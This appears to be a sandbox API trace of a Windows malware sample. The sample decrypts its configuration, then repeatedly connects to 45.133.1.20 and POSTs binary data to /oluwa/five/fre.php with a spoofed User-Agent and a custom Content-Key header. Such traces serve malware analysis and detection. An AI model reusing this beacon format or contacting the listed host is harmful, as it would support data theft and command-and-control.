(HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0187.655] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6c0238*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0187.655] GetProcessHeap () returned 0x6a0000 [0187.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0187.655] socket (af=2, type=1, protocol=6) returned 0x45c [0187.655] connect (s=0x45c, name=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0187.683] FreeAddrInfoW (pAddrInfo=0x6c0238*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0187.683] GetProcessHeap () returned 0x6a0000 [0187.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0187.683] GetProcessHeap () returned 0x6a0000 [0187.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0187.684] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0187.685] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0187.685] GetProcessHeap () returned 0x6a0000 [0187.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6de0 [0187.685] GetProcessHeap () returned 0x6a0000 [0187.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0187.686] GetProcessHeap () returned 0x6a0000 [0187.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0187.686] GetProcessHeap () returned 0x6a0000 [0187.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0187.686] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0187.687] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0187.687] GetProcessHeap () returned 0x6a0000 [0187.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b6ea0 [0187.687] GetProcessHeap () returned 0x6a0000 [0187.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0187.688] send (s=0x45c, buf=0x6b6ea0*, len=242, flags=0) returned 242 [0187.688] send (s=0x45c, buf=0x6bb998*, len=159, flags=0) returned 159 [0187.689] GetProcessHeap () returned 0x6a0000 [0187.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0187.689] recv (in: s=0x45c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0187.753] GetProcessHeap () returned 0x6a0000 [0187.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6ea0 | out: hHeap=0x6a0000) returned 1 [0187.755] GetProcessHeap () returned 0x6a0000 [0187.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0187.756] GetProcessHeap () returned 0x6a0000 [0187.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0187.756] GetProcessHeap () returned 0x6a0000 [0187.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0187.757] closesocket (s=0x45c) returned 0 [0187.757] GetProcessHeap () returned 0x6a0000 [0187.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0187.757] GetProcessHeap () returned 0x6a0000 [0187.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0187.758] GetProcessHeap () returned 0x6a0000 [0187.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0187.758] GetProcessHeap () returned 0x6a0000 [0187.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0187.759] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1190) returned 0x45c [0187.761] Sleep (dwMilliseconds=0xea60) [0187.762] GetProcessHeap () returned 0x6a0000 [0187.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0187.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.764] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0187.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.771] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0187.780] GetProcessHeap () returned 0x6a0000 [0187.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6c38 [0187.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.781] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b6c38, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0187.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.782] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.784] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.784] GetProcessHeap () returned 0x6a0000 [0187.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6c38 | out: hHeap=0x6a0000) returned 1 [0187.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.786] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0187.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.787] CryptDestroyKey (hKey=0x6ad020) returned 1 [0187.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.788] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0187.788] GetProcessHeap () returned 0x6a0000 [0187.788] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0187.794] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.795] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0187.796] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.796] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0187.797] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.797] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0187.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.799] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0187.799] GetProcessHeap () returned 0x6a0000 [0187.799] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0187.799] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0187.799] GetProcessHeap () returned 0x6a0000 [0187.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0187.799] GetProcessHeap () returned 0x6a0000 [0187.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0187.800] GetProcessHeap () returned 0x6a0000 [0187.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0187.800] GetProcessHeap () returned 0x6a0000 [0187.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0187.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.801] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0187.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.808] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0187.815] GetProcessHeap () returned 0x6a0000 [0187.815] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0187.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.817] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0187.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.818] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.819] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.819] GetProcessHeap () returned 0x6a0000 [0187.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0187.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.821] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0187.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.822] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0187.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.823] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0187.823] GetProcessHeap () returned 0x6a0000 [0187.823] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0187.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.824] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0187.825] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.825] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0187.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.827] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0187.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0187.828] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0187.828] GetProcessHeap () returned 0x6a0000 [0187.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0187.829] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0187.829] GetProcessHeap () returned 0x6a0000 [0187.829] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0187.829] socket (af=2, type=1, protocol=6) returned 0x204 [0187.829] connect (s=0x204, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0187.852] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0187.852] GetProcessHeap () returned 0x6a0000 [0187.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0187.852] GetProcessHeap () returned 0x6a0000 [0187.852] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0187.853] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0187.854] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0187.854] GetProcessHeap () returned 0x6a0000 [0187.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0187.854] GetProcessHeap () returned 0x6a0000 [0187.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0187.855] GetProcessHeap () returned 0x6a0000 [0187.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0187.855] GetProcessHeap () returned 0x6a0000 [0187.855] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0187.855] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0187.856] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0187.856] GetProcessHeap () returned 0x6a0000 [0187.856] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0187.856] GetProcessHeap () returned 0x6a0000 [0187.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0187.857] send (s=0x204, buf=0x6b5c98*, len=242, flags=0) returned 242 [0187.858] send (s=0x204, buf=0x6bb998*, len=159, flags=0) returned 159 [0187.858] GetProcessHeap () returned 0x6a0000 [0187.858] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0187.858] recv (in: s=0x204, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0187.961] GetProcessHeap () returned 0x6a0000 [0187.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0187.961] GetProcessHeap () returned 0x6a0000 [0187.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0187.962] GetProcessHeap () returned 0x6a0000 [0187.962] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0187.962] GetProcessHeap () returned 0x6a0000 [0187.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0187.963] closesocket (s=0x204) returned 0 [0187.963] GetProcessHeap () returned 0x6a0000 [0187.963] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa60 | out: hHeap=0x6a0000) returned 1 [0187.963] GetProcessHeap () returned 0x6a0000 [0187.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0187.964] GetProcessHeap () returned 0x6a0000 [0187.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0187.964] GetProcessHeap () returned 0x6a0000 [0187.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0187.965] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x119c) returned 0x204 [0187.966] Sleep (dwMilliseconds=0xea60) [0187.968] GetProcessHeap () returned 0x6a0000 [0187.968] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0187.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.969] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0187.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.980] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0187.992] GetProcessHeap () returned 0x6a0000 [0187.992] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0187.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.993] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0187.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.994] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.995] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.995] GetProcessHeap () returned 0x6a0000 [0187.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0187.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.997] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0187.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0187.998] CryptDestroyKey (hKey=0x6ad020) returned 1 [0187.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.015] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0188.015] GetProcessHeap () returned 0x6a0000 [0188.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0188.015] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.016] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0188.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.017] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0188.019] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.020] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0188.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.021] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0188.021] GetProcessHeap () returned 0x6a0000 [0188.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0188.021] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0188.021] GetProcessHeap () returned 0x6a0000 [0188.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0188.022] GetProcessHeap () returned 0x6a0000 [0188.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0188.022] GetProcessHeap () returned 0x6a0000 [0188.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0188.022] GetProcessHeap () returned 0x6a0000 [0188.023] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0188.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.024] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0188.033] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.033] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0188.041] GetProcessHeap () returned 0x6a0000 [0188.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0188.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.043] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0188.044] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.044] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0188.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.045] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0188.045] GetProcessHeap () returned 0x6a0000 [0188.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0188.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.047] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0188.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.063] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0188.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0188.064] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0188.068] GetProcessHeap () returned 0x6a0000 [0188.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0188.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.069] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0188.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.072] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0188.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.073] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0188.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0188.074] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0188.074] GetProcessHeap () returned 0x6a0000 [0188.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0188.074] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0188.074] GetProcessHeap () returned 0x6a0000 [0188.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0188.074] socket (af=2, type=1, protocol=6) returned 0x210 [0188.080] connect (s=0x210, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0188.109] FreeAddrInfoW 